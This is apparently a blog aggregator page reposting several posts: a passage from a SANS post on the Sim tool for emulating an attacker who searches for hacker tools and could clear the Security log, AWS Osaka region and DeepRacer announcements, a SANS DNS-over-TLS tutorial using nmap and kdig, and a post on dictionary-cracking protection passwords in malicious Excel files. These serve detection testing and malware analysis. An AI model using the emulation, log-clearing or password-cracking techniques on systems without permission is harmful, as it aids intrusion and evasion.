I built Sim in Visual Studio; it’s posted to GitHub as a source-only project but with a solution file so compiling your own sim.exe is quick and easy. I also created a copy of the admindemo.xml file found in XMLExamples, saved it as sim_toolsmith_demo.xml and made some tweaks to create a more adversarial user.
I’ve shared my modifications for your use and consideration as a Gist.

Calling my demo file with sim.exe is as easy as Sim.exe sim_toolsmith_demo.xml (unique to your file structure) at an admin command prompt.


Figure 1: Sim with actions config file

Rather than talk about it, I captured a video to exhibit Sim’s run through my adversarial user configuration file. Imagine this adversary as a script kiddie who has popped a system and is now searching for hacker tools to expand terrain. You’ll note PowerShell calls as well as command prompt actions. Actions also include Google searches, including multiple browser tabs, as well as keyboard tabs to land on desired search content. This config also saves the Windows Security event log, noteworthy because it could just as easily have cleared it, which should always trigger an alert.

Sim demo video

As you can see, Sim does a great job of emulating user behaviors, and can easily be configured to conduct far more adversarial behaviors as desired. This particular demonstration would likely trigger alerts for web filtering rules intended to block access to hacker tools. Detections that make use of PowerShell logging could certainly be easily tested here as well. And again, if the Security event log had been cleared instead of simply written off to a file, any detection rules or signatures monitoring the 1100 series of Windows Event Logs would have triggered, particularly Event ID 1102 – The audit log was cleared.
I assert that Sim could be batched and automated. You could deploy an entire range of adversary emulations to a central share then call a master file during a desired and scheduled test or emulation window. Group Policy is even an option. Obviously, it is not recommended to fire off Sim jobs designed to emulate adversarial behavior without working with your leadership and any teams who may be monitoring user behaviors. Much like penetration testing, definitely ask for written permission rather than forgiveness after the fact.
I hope Hope will keep developing against this project, the possibilities are endless for adversary emulation scenarios, end Sim is really light and highly flexible. It’s great work, please safely give it a go for yourselves!

Cheers…until next time.

Russ McRee | @holisticinfosec


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Asia Pacific (Osaka) Region Now Open to All, with Three AZs and More Services

This post was originally published on this site

AWS has had a presence in Japan for a long time! We opened the Asia Pacific (Tokyo) Region in March 2011, added a third Availability Zone (AZ) in 2012, and a fourth in 2018. Since that launch, customers in Japan and around the world have used the region to host an incredibly wide variety of applications!

We opened the Osaka Local Region in 2018 to give our customers in Japan a disaster recovery option for their workloads. Located 400 km from Tokyo, the Osaka Local Region used an isolated, fault-tolerant design contained within a single data center.

From Local to Standard
I am happy to announce that the Osaka Local Region has been expanded and is a now a standard AWS region, complete with three Availability Zones. As is always the case with AWS, the AZs are designed to provide physical redundancy, and are able to withstand power outages, internet downtime, floods, and other natural disasters.

The following services are available, with more in the works: Amazon Elastic Kubernetes Service (EKS), Amazon API Gateway, Auto Scaling, Application Auto Scaling, Amazon Aurora, AWS Config, AWS Personal Health Dashboard, AWS IQ, AWS Organizations, AWS Secrets Manager, AWS Shield Standard (regional), AWS Snowball Edge, AWS Step Functions, AWS Systems Manager, AWS Trusted Advisor, AWS Certificate Manager, CloudEndure Migration, CloudEndure Disaster Recovery, AWS CloudFormation, Amazon CloudFront, AWS CloudTrail, Amazon CloudWatch, CloudWatch Events, Amazon CloudWatch Logs, AWS CodeDeploy, AWS Database Migration Service, AWS Direct Connect, Amazon DynamoDB, Elastic Container Registry, Amazon Elastic Container Service (ECS), AWS Elastic Beanstalk, Amazon Elastic Block Store (EBS), Amazon Elastic Compute Cloud (EC2), EC2 Image Builder, Elastic Load Balancing, Amazon EMR, Amazon ElastiCache, Amazon EventBridge, AWS Fargate, Amazon Glacier, AWS Glue, AWS Identity and Access Management (IAM), AWS Snowball, AWS Key Management Service (KMS), Amazon Kinesis Data Firehose, Amazon Kinesis Data Streams, AWS Lambda, AWS Marketplace, AWS Mobile SDK, Network Load Balancer, Amazon Redshift, Amazon Relational Database Service (RDS), Amazon Route 53, Amazon Simple Notification Service (SNS), Amazon Simple Queue Service (SQS), Amazon Simple Storage Service (S3), Amazon Simple Workflow Service (SWF), AWS VPN, VM Import/Export, AWS X-Ray, AWS Artifact, AWS PrivateLink, and Amazon Virtual Private Cloud (VPC).

The Asia Pacific (Osaka) Region supports the C5, C5d, D2, I3, I3en, M5, M5d, R5d, and T3 instance types, in On-Demand, Spot, and Reserved Instance form. X1 and X1e instances are available in a single AZ.

In addition to the AWS regions in Tokyo and Osaka, customers in Japan also benefit from:

  • 16 CloudFront edge locations in Tokyo.
  • One CloudFront edge location in Osaka.
  • One CloudFront Regional Edge Cache in Tokyo.
  • Two AWS Direct Connect locations in Tokyo.
  • One Direct Connect location in Osaka.

Here are typical latency values from the Asia Pacific (Osaka) Region to other cities in the area:

City Latency
Nagoya 2-5 ms
Hiroshima 2-5 ms
Tokyo 5-8 ms
Fukuoka 11-13 ms
Sendai 12-15 ms
Sapporo 14-17 ms
Seoul 27 ms
Taipei 29 ms
Hong Kong 38 ms
Manila 49 ms

AWS Customers in Japan
As I mentioned earlier, our customers are using the AWS regions in Tokyo and Osaka to host an incredibly wide variety of applications. Here’s a sampling:

Mitsubishi UFJ Financial Group (MUFG) – This financial services company adopted a cloud-first strategy and did their first AWS deployment in 2017. They have built a data platform for their banking and group data that helps them to streamline administrative processes, and also migrated a market risk management system. MUFG has been using the Osaka Local Region and is planning to use the Asia Pacific (Osaka) Region to run more workloads and to support their ongoing digital transformation.

KDDI Corporation (KDDI) – This diversified (telecommunication, financial services, Internet, electricity distribution, consumer appliance, and more) company started using AWS in 2016 after AWS met KDDI’s stringent internal security standards. They currently build and run more than 60 services on AWS, including the backend of the au Denki application, used by consumers to monitor electricity usage and rates. They plan to use the Asia Pacific (Osaka) Region to initiate multi-region service to their customers in Japan.

OGIS-RI – Founded in 1983, this global IT consulting firm is a part of the Daigas Group of companies. OSIS-RI provides information strategy, systems integration, systems development, network construction, support, and security. They use AWS to provide their enterprise customers with ekul, a data measurement service that measures and visualizes gas and electricity usage in real time and send it to corporate customers across Japan.

Sony Bank – Founded in 2001 as an asset management bank for individuals, Sony Bank provides services that include foreign currency deposits, home loans, investment trusts, and debit cards. Their gradual migration of internal banking systems to AWS began in 2013 and was 80% complete at the end of 2019. This migration reduced their infrastructure costs by 60% and more than halved the time it once took to procure and build out new infrastructure.

AWS Resources in Japan
As a quick reminder, enterprises, government and research organizations, small and medium businesses, educators, and startups in Japan have access to a wide variety of AWS and community resources. Here’s a sampling:

Available Now
The new region is open to all AWS customers and you can start to use it today!



AWS DeepRacer League’s 2021 Season Launches With New Open and Pro Divisions

This post was originally published on this site

AWS DeepRacer League LogoAs a developer, I have been hearing a lot of stories lately about how companies have solved their business problems using machine learning (ML), so one of my goals for 2021 is to learn more about it.

For the last few years I have been using artificial intelligence (AI) services such as, Amazon Rekognition, Amazon Comprehend, and others extensively. AI services provide a simple API to solve common ML problems such as image recognition, text to speech, and analysis of sentiment in a text. When using these high-level APIs, you don’t need to understand how the underlying ML model works, nor do you have to train it, or maintain it in any way.

Even though those services are great and I can solve most of my business cases with them, I want to understand how ML algorithms work, and that is how I started tinkering with AWS DeepRacer.

AWS DeepRacer, a service that helps you learn reinforcement learning (RL), has been around since 2018. RL is an advanced ML technique that takes a very different approach to training models than other ML methods. Basically, it can learn very complex behavior without requiring any labeled training data, and it can make short-term decisions while optimizing for a long-term goal.

AWS DeepRacer is an autonomous 1/18th scale race car designed to test RL models by racing virtually in the AWS DeepRacer console or physically on a track at AWS and customer events. AWS DeepRacer is for developers of all skill levels, even if you don’t have any ML experience. When learning RL using AWS DeepRacer, you can take part in the AWS DeepRacer League where you get experience with machine learning in a fun and competitive environment.

Over the past year, the AWS DeepRacer League’s races have gone completely virtual and participants have competed for different kinds of prizes. However, the competition has become dominated by experts and newcomers haven’t had much of a chance to win.

The 2021 season introduces new skill-based Open and Pro racing divisions, where racers of all skill levels have five times more opportunities to win rewards than in previous seasons.

Image of the leagues in the console

How the New AWS DeepRacer Racing Divisions Work

The 2021 AWS DeepRacer league runs from March 1 through the end of October. When it kicks off, all participants will enter the Open division, a place to have fun and develop your RL knowledge with other community members.

At the end of every month, the top 10% of the Open division leaderboard will advance to the Pro division for the remainder of the season; they’ll also receive a Pro Welcome kit full of AWS DeepRacer swag. Pro division racers can win DeepRacer Evo cars and AWS DeepRacer merchandise such as hats and T-shirts.

At the end of every month, the top 16 racers in the Pro division will compete against each other in a live race console. That race will determine who will advance that month to the 2021 Championship Cup at re:Invent 2021.

The monthly Pro division winner gets an expenses-paid trip to re:Invent 2021 and participates in the Championship Cup to get a chance to win a Machine Learning education sponsorship worth $20k.

In both divisions, you can collect digital rewards, including vehicle customizations and accessories which will be released to participants once the winners are announced each month. 

You can start racing in the Open division any time during the 2021 season. Get started here!

Image of my racer profileNew Racer Profiles Increase the Fun

At the end of March, you will be able to create a new racer profile with an avatar and show the world which country you are representing.

I hope to see you in the new AWS DeepRacer season, where I’ll start in the Open division as MaVi.

Start racing today and train your first model for free! 


Fun with DNS over TLS (DoT), (Mon, Mar 1st)

This post was originally published on this site

Going back a few weeks, we discussed how DNS over HTTPS (DoH) works (  – very much as an unauthenticated API over HTTPS.  But DNS over TLS (DoT) has been with us for a fair bit longer (May 2016), why haven't we heard about it so much?

After wrestling with it for a bit, I can tell you why!

DoH is easy to work with, since we have so many HTTPS tools at our disposal.  Plus DoH was first implemented in browsers, and the browser developers *live* in HTTPS, so DoH is a cake-walk for them.  DNSSEC is basically plain old unencrypted DNS, but with signature records.

DoT on the other hand is a whole 'nother beast.  It's still basic DNS, but encapsulated in TLS.  So to make DoT calls we need a toolset to create TLS packets, then send and validate them using the certificate at the server side.  So the first tool that came to my mind of course was scapy, but read on, I used an easier method ..

To allow all of the mentioned DNS protocols to live on one server, DoT lives on tcp/853.  This makes for an easy NMAP scan if you're looking for this service.  NMAP tags the port correctly, but an NMAP version scan (-sV) won't identify  the DoT service.  It will however find some critical strings in the fingerprint, things like "DNSVersionBindReqTCP" and "DNSStatusRequestTCP" – so a version scan will validate the service enough for your eyes to see it, without calling it out definitively.  You can also of course validate the certificate on port tcp/853 using NMAP's ssl-cert.nse script or openssl:

nmap -p853 –script ssl-cert

Starting Nmap 7.80 ( ) at 2021-03-01 07:55 Eastern Standard Time

Nmap scan report for

Host is up (0.012s latency).



853/tcp open  domain-s

| ssl-cert: Subject: LLC/stateOrProvinceName=California/countryName=US

| Subject Alternative Name:, DNS:*,,,, IP Address:2001:4860:4860:0:0:0:0:64, IP Address:2001:4860:4860:0:0:0:0:6464, IP Address:2001:4860:4860:0:0:0:0:8844, IP Address:2001:4860:4860:0:0:0:0:8888, IP Address:, IP Address:

| Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2021-01-26T08:54:07

| Not valid after:  2021-04-20T08:54:06

| MD5:   9edd 82e5 5661 89c0 13a5 cced e040 c76d

|_SHA-1: 2e80 c54b 0c55 f8ad 3d61 f9ae af43 e70c 1e67 fafd

Nmap done: 1 IP address (1 host up) scanned in 24.43 seconds

Me, I took the easy way out for DoT queries and installed the knot-dnsutils (sudo apt-get install knot-dnsutils), which installs kdig to do all the heavy lifting for me.  As the name implies, kdig does just about everything that dig does, but for this task gives you parameters to make DoT queries.

So an A record query over DoT from kdig looks just very much like DOS query outpuyt from dig:

$ kdig +tls-ca A

;; TLS session (TLS1.3)-(ECDHE-X25519)-(RSA-PSS-RSAE-SHA256)-(AES-256-GCM)

;; ->>HEADER<<- opcode: QUERY; status: NOERROR; id: 57540

;; Flags: qr rd ra; QUERY: 1; ANSWER: 2; AUTHORITY: 0; ADDITIONAL: 1



;; Version: 0; flags: ; UDP size: 512 B; ext-rcode: NOERROR

;; PADDING: 391 B


;;                IN      A

;; ANSWER SECTION:           4       IN      A           4       IN      A


;; Received 468 B

;; Time 2021-03-01 04:58:51 PST

;; From in 38.9 ms

Note all the TLS session info at the top, and the port number in the last line.

As you'd expect, if you're just after answers you can use the +short parameter:

# kdig +tls-ca +short AAAA

.. yup, I host my website on github, handiest github feature ever (ok, maybe not the handiest, but still pretty darned handy)

Other handy parameters in kdig?

  • Just as in dig, you can always tack on the "-d" parameter for debug output
  • +tls-hostname can be used to over-ride the server name during TLS negotiation.  This means you can even use the server's IP address when you use this parameter.
  • Related to tls-hostname, +tls-sni adds the Server Name Indication field to the request

Without constructing the TLS packet, how can I use DoT in an NMAP script?  I again took the easy way out and used kdig, in combination with the lua command os.execute.  Yup, in the time honoured tradition of coding laziness I shelled out and executed the matching OS command!  In the DoH script I wrote I did a quick check to make sure that the host was running HTTP services on port 443 with "shortport.http".  In the DoT script I changed this, to ensure that TLS is running on the scanned port, using the "shortport.ssl" check.  An example scan is shown below:

$ nmap -p853 –script dns-dot.nse –script-args,query=AAAA

Starting Nmap 7.80 ( ) at 2021-03-01 05:13 PST

Nmap scan report for (

Host is up (0.017s latency).



853/tcp open  domain-s

| dns-dot:





|   2607:f798:d04:189::b33

|_  2607:f798:d04:191::b33


Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

You can find the DoT script here: . Because is calls kdig, you'll need the knot-dnsutils package installed before this script will run.  If you're interested in combining NMAP scans with different OS commands you're welcome to review the source code and use whatever you need!

Do you have a handy nmap script that uses os.execute to do the "behind the scenes" work?  Please, share a link in our comment form!



Usage Profiles for DNS over TLS and DNS over DTLS:



Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Maldocs: Protection Passwords, (Sun, Feb 28th)

This post was originally published on this site

In diary entry "Unprotecting Malicious Documents For Inspection" I explain how to deal with protected malicious Excel documents by removing the protection passwords.

I created a new version of my plugin plugin_biff that attempts to recover protection passwords with a dictionary attack.

Here I use it with Brad's malicious spreadsheet sample:

It's not possible to determine if the recovered passwords (piano1 and 1qaz2wsx) are the actual passwords used by the malicious actors, or if they are the result of hash collisions (it's only a 32-bit hash). But they do work: you can remove the protections by using these passwords.


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Iron Castle Systems